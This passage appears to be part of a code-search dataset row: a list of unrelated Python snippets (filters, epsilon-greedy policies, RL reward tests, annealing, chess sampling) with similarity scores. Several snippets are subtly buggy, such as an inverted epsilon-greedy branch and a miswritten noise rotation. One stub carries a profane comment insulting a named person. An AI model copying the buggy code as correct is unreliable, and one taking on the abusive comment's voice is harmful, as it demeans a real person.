self.current_state_estimate[4,0]\n y = self.current_state_estimate[5,0]\n theta = self.current_state_estimate[6,0]\n vl = u[0,0]\n vr = u[1,0]\n \n # Vary noise with input voltage\n if abs(self.current_state_estimate[0,0]) < .03:\n self.Q[0,0] = .0000001\n dtheta_l = 0\n\n else:\n self.Q[0,0] = abs(vl)*.03/3000+.03\n\n if abs(self.current_state_estimate[1,0]) < .03:\n self.Q[1,1] = .0000001\n dtheta_r = 0\n else:\n self.Q[1,1] = abs(vr)*.03/3000+.03\n\n ## TRANSITION ESTIMATE\n self.current_state_estimate[0] += self.dt*(self.k2_l*dtheta_l + self.k1_l*vl)\n self.current_state_estimate[1] += self.dt*(self.k2_r*dtheta_r + self.k1_r*vr)\n self.current_state_estimate[2] = self.r/2 * (self.current_state_estimate[0] + self.current_state_estimate[1])\n self.current_state_estimate[3] = self.r/self.l * (self.current_state_estimate[1] - self.current_state_estimate[0])\n self.current_state_estimate[4] += (self.dt)*self.current_state_estimate[2]*math.cos(theta)\n self.current_state_estimate[5] += (self.dt)*self.current_state_estimate[2]*math.sin(theta)\n self.current_state_estimate[6] += (self.dt)*self.current_state_estimate[3]\n \n ## TRANISTION PROBABILITY\n # only propogate the things that can move\n self.A[0:7, 0:7] = np.array([[1+self.dt*self.k2_l, 0, 0, 0, 0, 0, 0],\\\n [0, 1+self.dt*self.k2_r, 0, 0, 0, 0, 0],\\\n [self.r/2, self.r/2, 0, 0, 0, 0, 0],\\\n [-self.r/self.l, self.r/self.l, 0, 0, 0, 0, 0],\\\n [0, 0, math.cos(theta)*self.dt , 0, 1, 0, -v*math.sin(theta)*self.dt],\\\n [0, 0, math.sin(theta)*self.dt , 0, 0, 1, v*math.cos(theta)*self.dt],\\\n [0, 0, 0, self.dt, 0, 0, 1]])\n \n self.current_prob_estimate = np.dot(np.dot(self.A, self.current_prob_estimate), np.transpose(self.A)) + self.Q", "def predict(model, session_batch):\n predicted = np.zeros((len(session_batch), 4))\n for i, session in enumerate(session_batch): \n legal_moves = session.possible_moves(session.current_player())\n move_preds = get_move_predictions(model, legal_moves, session)\n\n chosen_move_index = move_preds[:, 0].argmax()\n predicted[i, :] = move_preds[chosen_move_index, :]\n return predicted", "def predict(self, u, dt):\n # if self.is_filter_stale():\n # return False\n # angular update\n th_dot = u[3] * dt + randn(self.num_particles) * self.input_std_error[3]\n self.particles[:, 0] 
= self.particles[:, 0] * np.cos(th_dot) - self.particles[:, 1] * np.sin(th_dot)\n self.particles[:, 1] = self.particles[:, 0] * np.sin(th_dot) + self.particles[:, 1] * np.cos(th_dot)\n \n # linear update\n self.particles[:, 0] += u[0] * dt + randn(self.num_particles) * self.input_std_error[0]\n self.particles[:, 1] += u[1] * dt + randn(self.num_particles) * self.input_std_error[1]\n self.particles[:, 2] += u[2] * dt + randn(self.num_particles) * self.input_std_error[2]\n\n return True", "def test_reward(self):\n success = True\n old_sim = self.sim\n old_robot_num = self.robot_num\n old_agents = copy.deepcopy(self.agents)\n old_obstacles = copy.deepcopy(self.obstacles)\n old_goals = copy.deepcopy(self.goals)\n old_action_list = copy.deepcopy(self.last_actions)\n\n # Test collision penalties and overtaking penalty\n self.sim = rvo2.PyRVOSimulator(\n 0.1, 1.0, 10, 5.0, 5.0, 0.2, 1.5, (0,0)\n )\n self.obstacles = []\n self.goals = []\n self.last_actions = []\n self.robot_num = self.sim.addAgent((0, 0))\n self.agents = [self.robot_num]\n self.agents.append(self.sim.addAgent((0.1, 0.1)))\n self.agents.append(self.sim.addAgent((-0.1, 0.1)))\n self.agents.append(self.sim.addAgent((0.1, -0.1)))\n self.agents.append(self.sim.addAgent((-0.1, -0.1)))\n r = self.reward()[0].item()\n exp = -4.22\n if r != exp:\n success = False\n print(\"Actual reward: \", r, \"Expected: \", exp)\n print(\"Explanation: -4 for 4 collisions, -0.2 for 4 predicted \"\n \"collisions, -0.02 for overtake penalty with top right agent\")\n\n # Test closeness penalties and overtaking penalty\n self.agents = []\n self.sim = rvo2.PyRVOSimulator(\n 0.1, 1.0, 10, 5.0, 5.0, 0.2, 1.5, (0,0)\n )\n self.robot_num = self.sim.addAgent((0, 0))\n self.agents = [self.robot_num]\n self.agents.append(self.sim.addAgent((0.35, 0.35)))\n self.agents.append(self.sim.addAgent((0.35, -0.35)))\n self.agents.append(self.sim.addAgent((-0.35, 0.35)))\n self.agents.append(self.sim.addAgent((-0.35, -0.35)))\n r = self.reward()[0].item()\n exp = -1.02\n if r != exp:\n success = False\n print(\"Actual reward: \", r, \"Expected: \", exp)\n print(\"Explanation: -1 for 4 closeness violations, -0.02 for \"\n \"overtake penalty with top right agent\")\n\n # Test passing penalty\n self.agents = []\n self.sim = rvo2.PyRVOSimulator(\n 0.1, 1.0, 10, 5.0, 5.0, 0.2, 1.5, (0, 0)\n )\n self.robot_num = self.sim.addAgent((0, 0))\n self.agents = [self.robot_num]\n self.agents.append(self.sim.addAgent((0.7, -0.5), 1.0, 10, 5.0, 5.0,\n 0.2, 1.5, (-0.5, 0)))\n r = self.reward()[0].item()\n exp = -0.02\n if r != exp:\n success = False\n print(\"Actual reward: \", r, \"Expected: \", exp)\n print(\"Explanation: -0.02 for passing violation\")\n\n # Test crossing penalty\n self.agents = []\n self.sim = rvo2.PyRVOSimulator(\n 0.1, 1.0, 10, 5.0, 5.0, 0.2, 1.5, (0, 0)\n )\n self.robot_num = self.sim.addAgent((0, 0))\n self.agents = [self.robot_num]\n self.agents.append(self.sim.addAgent((0.35, 0.3), 1.0, 10, 5.0, 5.0,\n 0.2, 1.5, (0, -0.5)))\n r = self.reward()[0].item()\n exp = -0.27\n if r != exp:\n success = False\n print(\"Actual reward: \", r, \"Expected: \", exp)\n print(\"Explanation: -0.02 for crossing violation, -0.25 for \"\n \"closeness violation\")\n\n # Test action penalty (moving)\n self.agents = []\n self.sim = rvo2.PyRVOSimulator(\n 0.1, 1.0, 10, 5.0, 5.0, 0.2, 1.5, (0, 0)\n )\n self.robot_num = self.sim.addAgent((0, 0))\n self.last_actions = [1, 1]\n self.last_action_ind = 0\n r = self.reward()[0].item()\n exp = -0.01\n if r != exp:\n success = False\n print(\"Actual 
reward: \", r, \"Expected: \", exp)\n print(\"Explanation: -0.01 for moving\")\n\n # Test action penalty (changing actions)\n self.agents = []\n self.sim = rvo2.PyRVOSimulator(\n 0.1, 1.0, 10, 5.0, 5.0, 0.2, 1.5, (0, 0)\n )\n self.robot_num = self.sim.addAgent((0, 0))\n self.last_actions = [1, 0]\n self.last_action_ind = 0\n r = self.reward()[0].item()\n exp = -0.01\n if r != exp:\n success = False\n print(\"Actual reward: \", r, \"Expected: \", exp)\n print(\"Explanation: -0.01 for changing actions\")\n\n self.sim = old_sim\n self.robot_num = old_robot_num\n self.agents = old_agents\n self.obstacles = old_obstacles\n self.goals = old_goals\n self.last_actions = old_action_list\n return success", "def test_deterministic(self):\n add_noise = self.variant(exploration.add_dirichlet_noise)\n\n # Test that noisy and noisless actions match for zero Dirichlet noise\n for _ in range(10):\n prior = np.random.normal(0., 1., (self._batch_size, self._num_actions))\n\n # Test output.\n self._rng_key, key = jax.random.split(self._rng_key)\n noisy_prior = add_noise(\n key, prior, dirichlet_alpha=0.3, dirichlet_fraction=0.)\n np.testing.assert_allclose(prior, noisy_prior)", "def act(self, observation):\n self.epsilon *= self.epsilon_decay\n\n if np.random.rand() < self.epsilon:\n return self.action_space.sample()\n else:\n return self.get_best_action(observation)", "def epsilon_insensitive(y_true,y_pred, epsilon):\n loss = T.maximum(T.abs_(y_true-y_pred)-epsilon,0)\n return loss", "def test_nn_predicts_accurate_results(self):\n self.nn.train_nn(self.X_train, self.y_train, 6, 10, 0.06)\n accuracy = 0\n X_test, y_test = load_data(\"../data/testdata.mat.tar.gz\")\n for i in range(len(X_test[:100])):\n out = self.nn.forward_prop(X_test[i])[0][-1]\n if np.argmax(out) == np.where(y_test[i])[0][0]:\n accuracy += 1\n else:\n print(\"Incorrect\", np.argmax(out))\n print(\"accuracy: \", accuracy)\n self.assertGreaterEqual(accuracy, 70)", "def getReward(self):\n# def evaluateFitness(self):\n fitness = 0.0\n distance = self.env.getDistance()\n speed = self.env.getSpeed()\n theta = self.env.getOrientation()\n\n ## implementation 101\n timeBonus = (self.maxTime - self.t)/self.maxTime\n alpha = 1.0/((1+distance)*(1+fabs(theta))*(speed+1));\n if distance < 0.5*self.env.init_distance :\n if(distance < self.env.vicinity_distance and\n abs(theta) < self.env.vicinity_orientation and\n speed < self.env.vicinity_speed ):\n fitness = 1 + timeBonus; \n else:\n fitness = alpha;\n else: fitness = 0\n self.lastFitness = fitness\n if fitness > self.bestFitness : \n self.bestFitness = fitness \n\n return fitness", "def run_prediction(self):\r\n self.get_prediction_indices()\r\n self.walk_forward_prediction()", "def test_neuron(self):\r\n # crear una lista 1-D (Horizontal, Entradas).\r\n Z = [1, 2, 3]\r\n # crear una lista 1-D (Vertical, Pesos de la red).\r\n W = [10, 20, 30]\r\n # Inicializamos la neurona, y obtenemos el valor que toma dado W * Z\r\n # X(k) = W * Z\r\n result = rhonn(W, Z).predict()\r\n # Comprobamos el resultado \r\n self.assertEqual(result, 140)", "def motion_model(particle_poses, speed_command, odom_pose, odom_pose_prev, dt):\n \n M = particle_poses.shape[0]\n \n # TODO. For each particle calculate its predicted pose plus some\n # additive error to represent the process noise. With this demo\n # code, the particles move in the -y direction with some Gaussian\n # additive noise in the x direction. 
Hint, to start with do not\n # add much noise.\n\n #time is in ns 1e-9\n dt = dt * 1e-9\n \n if dt ==0:\n return particle_poses\n\n for m in range(M):\n\n theta = particle_poses[m, 2]\n\n v = speed_command[0]\n omega = speed_command[1]\n \n if motion_model_velocity: #Velocity\n\n if omega == 0: #straight\n vel_dx = v * cos(theta) * dt\n vel_dy = v * sin(theta) * dt\n vel_dtheta = 0\n\n else:\n vel_dx = -v / omega * sin(theta) + v / omega * sin(theta + omega * dt)\n vel_dy = v / omega * cos(theta) - v / omega * cos(theta + omega * dt)\n vel_dtheta = omega * dt\n \n\n\n if motion_model_odom:\n odom_mov = rev_odm(odom_pose, odom_pose_prev)\n\n #particle_poses[m] = fwd_odm(particle_poses[m], odom_mov)\n\n #odom_dpose = fwd_odm2(particle_poses[m], odom_mov)\n (odom_dx, odom_dy, odom_dtheta) = fwd_odm2(particle_poses[m], odom_mov)\n\n\n\n\n #fusion\n w = motion_weighting\n dx = w * odom_dx + (1-w) * vel_dx\n dy = w * odom_dy + (1-w) * vel_dy\n dtheta = w * odom_dtheta + (1-w) * vel_dtheta\n \n \n\n \n \n #process noise\n if motion_model_noise:\n noise_x= np.random.normal(0, motion_sigma_x)\n noise_y= np.random.normal(0, motion_sigma_y)\n noise_theta= np.random.normal(0, motion_sigma_theta)\n \n #local noise\n if motion_model_noise_alt:\n localnoise_x = np.random.normal(0, motion_sigma_x)\n localnoise_y = np.random.normal(0, motion_sigma_y)\n\n noise_x = localnoise_x * cos(theta) - localnoise_y * sin(theta)\n noise_y = localnoise_y * sin(theta) + localnoise_y * cos(theta)\n noise_theta = np.random.normal(0, motion_sigma_theta)\n\n\n\n particle_poses[m, 0] += dx + noise_x\n particle_poses[m, 1] += dy + noise_y\n particle_poses[m, 2] = wraptopi(theta + dtheta + noise_theta)\n\n \n return particle_poses", "def time_to_failure():\r\n return random.expovariate(BREAK_MEAN)", "def epsilon_greedy(Q, epsilon, n_actions, s, train=False):\n if train or np.random.rand() < epsilon:\n action = np.argmax(Q[s, :])\n else:\n action = np.random.randint(0, n_actions)\n return action", "def test_move_default_extra_steps(self):\n player = ss.ResilientPlayer()\n random.seed(2)\n player.move()\n random.seed(1)\n player.move()\n random.seed(2)\n player.move()\n assert player.position == 32", "def random_play(board, NN, device=\"cpu\"):\r\n board_state_string = board.fen() # obtain state from board\r\n state_array = input_state(board_state_string) # turn state into an array format for NN\r\n is_black = not is_white(board_state_string)\r\n print(\"is black: \",is_black)\r\n legal_moves_array = np.zeros([4672]) # initialize array of legal moves\r\n legal_moves_array, move_dict = return_legal_moves(board, is_black)\r\n # print(\"state array shape: \", state_array.shape)\r\n # print(\"legal array sahpe: \", legal_moves_array.shape)\r\n legal_moves_prob_distribution, _ = (NN.run(state_array, legal_moves_array, device=device)) #we're assuming that NN forward runs the neural network\r\n # legal_moves_prob_distribution = legal_moves_prob_distribution / np.sum(legal_moves_prob_distribution) # normalize\r\n legal_moves_prob_distribution = legal_moves_prob_distribution.numpy().reshape(4672)\r\n # legal_moves_prob_distribution = legal_moves_prob_distribution - np.min(legal_moves_prob_distribution)\r\n # legal_moves_prob_distribution = legal_moves_prob_distribution /legal_moves_prob_distribution.sum()\r\n # print(\"legal_moves_prob_distribution sum \",abs(legal_moves_prob_distribution).sum())\r\n # print(\"legal_moves_prob_distribution sum \",(legal_moves_prob_distribution* legal_moves_arrayCopy).sum())\r\n # 
print(\"legal_moves_prob_distribution sum \",(legal_moves_prob_distribution).sum())\r\n action_idx = np.random.choice(4672, p = legal_moves_prob_distribution )\r\n print(\"action idx: \", action_idx)\r\n action_array = np.zeros([4672])\r\n action_array[action_idx] = 1\r\n move_text = move_dict[action_idx]\r\n print(\"move text: \", move_text)\r\n env_move = chess.Move.from_uci(move_text)\r\n board.push(env_move)\r\n return action_array", "def test_move(self):\n neq_gcmc_system_sampler.reset()\n\n # Just run one move, as they are a bit more expensive\n neq_gcmc_system_sampler.move(neq_gcmc_system_simulation.context, 1)\n\n # Check some of the variables have been updated as appropriate\n assert neq_gcmc_system_sampler.n_moves == 1\n assert 0 <= neq_gcmc_system_sampler.n_accepted <= 1\n assert len(neq_gcmc_system_sampler.Ns) == 1\n assert len(neq_gcmc_system_sampler.acceptance_probabilities) == 1\n\n # Check the NCMC-specific variables\n assert isinstance(neq_gcmc_system_sampler.velocities, Quantity)\n assert neq_gcmc_system_sampler.velocities.unit.is_compatible(nanometers/picosecond)\n assert len(neq_gcmc_system_sampler.insert_works) + len(neq_gcmc_system_sampler.delete_works) == 1\n assert 0 <= neq_gcmc_system_sampler.n_explosions <= 1\n\n return None", "def simulatedAnnealing(problem, maxSteps, userInteraction, beQuiet):\n\n import random\n from math import exp\n\n currentState = problem.state\n steps = 0\n bestYet = currentState\n # for visualization\n problem.hVals.append(problem.getObjValue(currentState))\n\n while steps<maxSteps:\n if problem.isGlobalOptimum(currentState):\n return steps, bestYet\n temperature = tempSchedule(steps, maxSteps)\n # print(temperature)\n if temperature == 0:\n return currentState\n neighbour = problem.getRandomNeighbour(currentState)\n changeInObj = problem.getObjValue(neighbour) - \\\n problem.getObjValue(currentState)\n if changeInObj > 0:\n # if the neighbour is better, jump\n currentState = neighbour\n if not beQuiet:\n if userInteraction:\n input(\"Press enter to continue \")\n print(\"Greedy step taken.\")\n problem.visualize(currentState)\n steps+=1\n\n currentVal = problem.getObjValue(currentState)\n bestYetVal = problem.getObjValue(bestYet)\n if problem.isBetter(currentVal, bestYetVal):\n bestYet = currentState\n\n # for visualization later on\n problem.hVals.append(problem.getObjValue(currentState))\n\n else:\n # if the neighbour is worse, jump with some probability\n if random.random() < exp(-1*changeInObj/temperature):\n \n currentState = neighbour\n if not beQuiet:\n if userInteraction:\n input(\"Press enter to continue \")\n print(\"Step in a worse direction taken.\")\n problem.visualize(currentState)\n steps+=1\n\n currentVal = problem.getObjValue(currentState)\n bestYetVal = problem.getObjValue(bestYet)\n if problem.isBetter(currentVal, bestYetVal):\n bestYet = currentState\n\n # for visualization later on\n problem.hVals.append(problem.getObjValue(currentState))\n return steps, bestYet", "def getPrediction(self, dna):\n \n # 1. run each predictor.\n #scoreSorted = sorted(self.Predictors, key=operator.attrgetter('score'))\n scoreSorted = self.Predictors\n \n chosenPredictor = None\n self.LastPredictor = None\n for i, predictor in enumerate(scoreSorted): \n predictor.update()\n \n move, confidence = predictor.play()\n predictor.moveLastTurn = move\n \n #confidence = round(confidence, 2) # round to the nearest 2 decimals\n \n #if confidence > 0.9: confidence = 0.9\n \n predictor.confidence = confidence\n \n #2. 
select the predictors with the highest confidence and score\n move, confidence = self.getHighestRank(dna)\n \n# predictor = self.LastPredictor\n# print(\"%s: %i (+%i/-%i) %.2f %f\" % (predictor.name.ljust(24), predictor.moveLastTurn,predictor.scoreWins, predictor.scoreLosts, predictor.confidence, predictor.rankingConfidence))\n\n #3. return the highest ranking\n return move, confidence", "def predict(self):\n if ((self.kf.x[6] + self.kf.x[2]) <= 0):\n self.kf.x[6] *= 0.0\n self.kf.predict()\n self.age += 1\n if (self.time_since_update > 0):\n self.hit_streak = 0\n self.time_since_update += 1\n self.history.append(convert_x_to_bbox(self.kf.x))\n return self.history[-1]", "def test():\n \n print('Loading best networks')\n env.guesser, agent.dqn = load_networks(i_episode='best')\n #env.guesser, agent.dqn = load_networks(i_episode='best', avg_reward = )\n\n # predict outcome on test data\n y_hat_test = np.zeros(len(env.y_test))\n y_hat_test_prob = np.zeros(len(env.y_test))\n \n print('Computing predictions of test data')\n n_test = len(env.X_test)\n for i in range(n_test):\n \n if i % 1000 == 0:\n print('{} / {}'.format(i, n_test))\n \n state = env.reset(mode='test', \n patient=i,\n train_guesser=False)\n mask = env.reset_mask()\n \n # run episode\n for t in range(FLAGS.episode_length):\n\n # select action from policy\n action = agent.get_action(state, eps=0, mask=mask)\n mask[action] = 0\n \n # take the action\n state, reward, done, guess = env.step(action, mode='test') \n \n if guess != -1:\n y_hat_test_prob[i] = torch.argmax(env.probs).item()\n \n if done:\n break\n y_hat_test[i] = guess\n \n C = confusion_matrix(env.y_test, y_hat_test)\n print('confusion matrix: ')\n print(C)\n\n acc = np.sum(np.diag(C)) / len(env.y_test)\n\n print('Test accuracy: ', np.round(acc, 3))", "def advance(self):\n #x and y coordinates move and advance by adding the randomly generated velocity \n self.center.x += self.velocity.dx\n self.center.y += self.velocity.dy\n return", "def _predict(self):\n \n # Initialization\n x_k = np.random.rand(4,0)\n w_k = np.ones((1,0))\n \n self.reset(phd_only=True)\n \n # Prediction of the targets' positions\n for k in range(1, self.n_time_steps+1):\n\n if k in self.observed_data.keys():\n\n # perform phd filter\n\n x_k1, w_k1, estimated_x_k1, n_targ_pred = self.PHDfilter(x_k, w_k, self.observed_data[k], k)\n\n # save predicted positions and update parameters\n self.phd_filter['n_targets_predicted'][k] = n_targ_pred\n self.phd_filter['particles_positions'][k] = x_k1\n if estimated_x_k1 is not None:\n self.phd_filter['estimated_positions'][k] = estimated_x_k1\n x_k, w_k = np.copy(x_k1), np.copy(w_k1)\n\n else:\n self.phd_filter['n_targets_predicted'][k] = 0", "def epsilonGreedyChooser(normalAction, state, stepsDone):\n epsThreshold = EPS_END + (EPS_START - EPS_END) * math.exp(-1. 
* stepsDone / EPS_DECAY)\n randomSample = random.random()\n if randomSample > epsThreshold:\n action = normalAction(state).max(1)[1].view(1, 1)[0].item()\n #print(action)\n return action\n else:\n return ENVIRONMENT.action_space.sample()", "def predict(self, states, actions):\n \"\"\" YOUR CODE HERE \"\"\"\n # normalize the data\n n_states = (states-self.mean_obs)/(self.std_obs+self.epsilon)\n n_actions = (actions-self.mean_action)/(self.std_action+self.epsilon)\n n_stat = np.concatenate([n_states,n_actions],axis=1)\n \n # predict using the model and unnromalize\n feed_dict = {self.st_at : n_stat}\n n_stp1 = self.sess.run(self.delta, feed_dict=feed_dict)\n\n un_stp1 = n_stp1*self.std_deltas + self.mean_deltas + states\n\n return un_stp1", "def random_exploration_step(self, sess):\n episode_reward = 0.0\n episode_len = 0 #num of action\n \n # random policy\n random_policy = np.zeros((1,2*self.ACTION_DIM))\n \n #for each episode reset first\n state = self.env.reset()\n for t in range(self.FLAGS.max_episode_len):\n action = self.env.action_space.sample() # random action\n \n next_state, reward, done, info = self.env.step(action) # next state, reward, terminal\n \n # insert this in memory with a uniform distribution over actions\n \n self.memory.add(Transition(state=state, action=action, \n reward=reward, done=done, \n distribution=random_policy, next_state = next_state))\n \n # accumulate rewards\n episode_reward += reward\n episode_len += 1 \n \n local_t = next(self.local_counter)\n global_t = next(self.global_counter)\n \n \n # update the state \n state = next_state \n \n if done:\n # print(\"Episode finished after {} timesteps\".format(t+1))\n break\n \n return episode_reward, episode_len, local_t, global_t", "def simulate(state: GameState) -> int:\n moves = list(state.moves)\n #print(\" moves available: \", moves)\n for i in range(len(state.moves)):\n move = random.choice(moves)\n #print(\" move making: \", move)\n move_idx = moves.index(move)\n #print(\" index of move: \", move_idx)\n moves.pop(move_idx)\n #print(\" new moves available: \", moves)\n state = state.traverse(move)\n #print(\" Winner: \", state.util)\n #print(\" New Board: \", state.display)\n return state.util", "def move(self):\n self._move_range_shuffle(3)\n self._move_satisfy_random_constraint()\n # self._move_range_shuffle(3)\n #if (curr_energy > 50):\n # self._move_satisfy_random_constraint()\n #else:\n # self._move_range_shuffle(3)", "def get_action(history, epsilon, step, model):\n if np.random.rand() <= epsilon or step <= FLAGS.observe_step_num:\n return random.randrange(ACTION_SIZE)\n else:\n q_value = model.predict([history, np.ones(ACTION_SIZE).reshape(1, ACTION_SIZE)])\n return np.argmax(q_value[0])", "def get_reward(self):\n\t\tdist = np.sqrt(np.sum(np.square(np.asarray(self.state) - np.asarray(self.goal))))\n\n\t\tdist_diff = self.prev_dist - dist\n\t\tself.reward = dist_diff * 10\n\n\t\tself.prev_dist = dist", "def evaluate(self):\n # initialize delta_weights\n Loss = 0\n for i, x_test in enumerate(self.X_test):\n Loss += (self.sigmoid(np.dot(self.weights,x_test))-self.y_test[i])**2\n return Loss", "def rough_outcome(self) -> float:\n # HUYNH YOU PRICK WHY THE FUCK DO YOU MAKE US WRITE THIS SHIT EVEN IT'S NOT USED ANYWHERE\n # pick move based on this may not be optimal but better than random\n # return 1 if win immediately\n # return -1 if all states reachable will result the other player win\n # return 0 if otherwise ??? 
what the fuck does this mean\n # look two states forward\n pass", "def transition_human(self, position, velocity, goal, dt):\n # type: (np.ndarray, float, np.ndarray, float) -> np.ndarray\n\n std_noise=np.copy(self._human_std_dev)\n if velocity <= 0.2:\n std_noise = std_noise*velocity\n\n noise = np.random.normal(loc=0.0, scale=std_noise, size=3)\n change_in_position = (velocity * dt * normalize(goal - position))\n dist_to_goal=np.linalg.norm(goal-position)\n dist_change = np.linalg.norm(change_in_position)\n if dist_change>dist_to_goal:\n change_in_position = goal - position\n\n change_in_position+= noise\n return position + change_in_position", "def _prediction_step(self, time_diff_s):\n # x = A * x + B\n heading_r = math.radians(self.estimated_heading())\n from control.telemetry import Telemetry\n x_delta, y_delta = Telemetry.rotate_radians_clockwise(\n (0.0, time_diff_s),\n heading_r\n )\n speed_m_s = self.estimated_speed()\n transition = numpy.matrix([ # A\n [1.0, 0.0, 0.0, x_delta],\n [0.0, 1.0, 0.0, y_delta],\n [0.0, 0.0, 1.0, 0.0],\n [0.0, 0.0, 0.0, 1.0]\n ])\n\n # Update heading estimate based on steering\n new_heading = Telemetry.wrap_degrees(\n self.estimated_heading()\n + self._estimated_turn_rate_d_s * time_diff_s\n )\n self._estimates.itemset(2, new_heading)\n\n # TODO: Add acceleration values\n\n self._estimates = transition * self._estimates\n return transition", "def policy_eval(policy, env, discount_factor=1.0, theta=0.00001):\n\n # Start with a random (all 0) value function\n V = np.zeros(env.nS)\n \n while True: #any(Vdiff > theta):\n \n delta_V = 0\n\n for i in range(env.nS):\n \n # need to calculate the value of taking each of the available actions\n\n action_val = np.zeros(env.nA)\n\n for a in range(env.nA):\n \n # get transition tuple for this state and action\n tup = env.P[i][a][0]\n \n # calculate the value of this action/state? \n # value = reward + gamma * (prob * V[next_state])\n # error here I think, probability missing\n action_val[a] = tup[0] * (tup[2] + discount_factor * V[tup[1]])\n \n \n Vold = V[i]\n Vnew = np.dot(policy[i],action_val)\n delta_V = max(delta_V,np.abs(Vnew - Vold))\n # get state value by multiplying probability of taking action (policy) by action value\n V[i] = Vnew\n \n #print(action_val)\n #print(policy[i])\n #print(V[i])\n #print(delta_V)\n\n # function only works if I use this delta rule to terminate\n if delta_V < theta:\n break\n return np.array(V)", "def act(self, state, epsilon, env):\n if random.random() > epsilon:\n state = Variable(torch.FloatTensor(state)).unsqueeze(0) # adds extra dim when single input\n state = self.vari_gpu(state)\n _, u_opt = self.forward(state)\n action = (u_opt.cpu().detach().numpy()) # compute the u*[0] \n #print('act:q_value ',q_value)\n #print('act:model action ',action)\n else:\n rand = np.random.rand(int(np.array(env.action_space.shape)))\n high = env.action_space.high\n low = env.action_space.low\n action = low + rand*(high-low)\n #print('act: ',action)\n return action" ]
[ "0.702739", "0.69440806", "0.61970955", "0.60627735", "0.60549825", "0.6046344", "0.5988161", "0.5935208", "0.59265876", "0.59182566", "0.58736765", "0.5839762", "0.58332235", "0.5812775", "0.5812775", "0.5780309", "0.5775754", "0.5767696", "0.57500184", "0.57460207", "0.5745925", "0.5745838", "0.5720917", "0.5716849", "0.5715711", "0.57144064", "0.5710225", "0.5701234", "0.56990963", "0.5693721", "0.5688274", "0.5679081", "0.56787044", "0.5657852", "0.565436", "0.56520724", "0.564802", "0.56428814", "0.56394", "0.5632058", "0.55991393", "0.55964583", "0.5589674", "0.5583144", "0.55690324", "0.5556454", "0.5538535", "0.55327857", "0.5530325", "0.552897", "0.5525419", "0.5520339", "0.5512431", "0.5502124", "0.55011934", "0.55011714", "0.5486749", "0.5485374", "0.5482961", "0.5482222", "0.54783386", "0.54769105", "0.545877", "0.5457679", "0.54572177", "0.5456454", "0.54538953", "0.54486936", "0.54259145", "0.5425716", "0.5424205", "0.5418398", "0.5417004", "0.5411201", "0.54069275", "0.54057527", "0.53959733", "0.5395244", "0.53905916", "0.539034", "0.53875417", "0.538642", "0.5381477", "0.5378614", "0.5376681", "0.5372337", "0.53709656", "0.53647566", "0.53646636", "0.5358925", "0.5353479", "0.5353389", "0.53531796", "0.5351718", "0.534749", "0.5347332", "0.5344621", "0.5341667", "0.53408766", "0.5338023", "0.5329543" ]
0.0
-1
Calculate yj = rj + gamma * max_a Q(s', a), or yj = rj for a terminating state. This is the target value used to train the neural network, and it uses the target network to make the predictions
def get_target(self, batch):
    # initialise array to store yj values
    target = np.zeros((len(batch[0]), self.num_actions))
    # loop over samples in the minibatch
    for j in range(len(batch[0])):
        a0_i = self.action_str2idx(batch[1][j])
        r0 = batch[2][j]
        done = batch[3][j]
        s1 = batch[4][j]
        # if terminating state
        if done:
            target[j, a0_i] = r0
        else:
            qs_target = self.target_Qmodel.predict(s1)
            target[j, a0_i] = r0 + self.gamma * np.max(qs_target)
    return target
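As an illustrative aside, the Bellman target computed above can be sanity-checked numerically with a minimal, self-contained sketch; the gamma value, action count, and the stub standing in for target_Qmodel.predict below are assumptions chosen only for demonstration and are not part of the dataset row.

import numpy as np

gamma = 0.99        # assumed discount factor for illustration
num_actions = 3     # assumed action count for illustration

def target_q_predict(s1):
    # Stand-in for self.target_Qmodel.predict(s1): one row of Q-values, one entry per action.
    return np.array([[0.5, 1.2, -0.3]])

# One toy transition: chosen action index 1, reward 1.0, non-terminal next state.
a0_i, r0, done, s1 = 1, 1.0, False, None

target = np.zeros((1, num_actions))
if done:
    target[0, a0_i] = r0                              # yj = rj at a terminating state
else:
    qs_target = target_q_predict(s1)                  # Q-values from the target network
    target[0, a0_i] = r0 + gamma * np.max(qs_target)  # yj = rj + gamma * max_a' Q_target(s', a')

print(target)  # [[0.    2.188 0.   ]] since 1.0 + 0.99 * 1.2 = 2.188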
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def Q_net(self, state):\n\t\tif not self._prediction_made: \n\t\t\tQ = tf.matmul(tf.nn.relu( tf.matmul(state, self.weights_hidden) + self.bias_hidden ), self.weights_out) + self.bias_out \n\t\t\tself._Qval = Q\t\n\t\t\tself._prediction_made = True\n\t\treturn self._Qval", "def final_result(self, board):\n if board.myMarbles>board.opMarbles:\n reward = self.win_value + self.myMarbles - self.opMarbles\n elif board.myMarbles == board.opMarbles:\n reward = self.draw_value\n else:\n reward = self.loss_value + self.myMarbles-self.opMarbles\n self.game_counter += 1\n self.add_game_to_replay_buffer(reward)\n\n # If we are in training mode we run the optimizer.\n if self.training and (self.game_counter > self.pre_training_games):\n\n batch_third = self.batch_size // 3\n train_batch = self.replay_buffer_win.sample(batch_third)\n train_batch.extend(self.replay_buffer_loss.sample(batch_third))\n train_batch.extend(self.replay_buffer_draw.sample(batch_third))\n train_batch = np.array(train_batch)\n\n #\n # Let's compute the target q values for all non terminal move\n # We extract the resulting state, run it through the target net work and\n # get the maximum q value (of all valid moves)\n next_states = [s[2] for s in train_batch if s[2] is not None]\n # print('current board\\n', board)\n # print('next_states', next_states)\n target_qs = []\n\n if len(next_states) > 0:\n firstInput = [self.board_state_to_nn_input(s) for s in next_states]\n # print(firstInput)\n firstInput = np.asarray(firstInput).reshape(20, 1,2,6)[0]\n # print(firstInput.shape)\n # for i in next_states:\n # print(i[0])\n # print(i[1])\n # input()\n probs, qvals = self.get_valid_probs(firstInput,\n self.target_net, [Board(s[0], s[1]) for s in next_states], True)\n # print(probs)\n # print(qvals)\n # input()\n probs=probs[0]\n qvals=qvals[0]\n # print(qvals)\n i = 0\n for t in train_batch:\n if t[2] is not None:\n # print(t[2])\n # print(probs)\n # input()\n max_move = np.argmax(probs)\n max_qval = qvals[max_move]\n target_qs.append(max_qval * self.reward_discount)\n i += 1\n else:\n target_qs.append(t[3])\n\n if i != len(next_states):\n (\"Something wrong here!!!\")\n else:\n target_qs.extend(train_batch[:, 6])\n\n # We convert the input states we have recorded to feature vectors to feed into the training.\n nn_input = [self.board_state_to_nn_input(x[0]) for x in train_batch]\n actions = train_batch[:, 1]\n\n # We run the training step with the recorded inputs and new Q value targets.\n # print(self.q_net.merge.shape)\n # print(self.q_net.train_step.shape)\n # print(np.asarray([self.q_net.merge, self.q_net.train_step]).shape)\n # 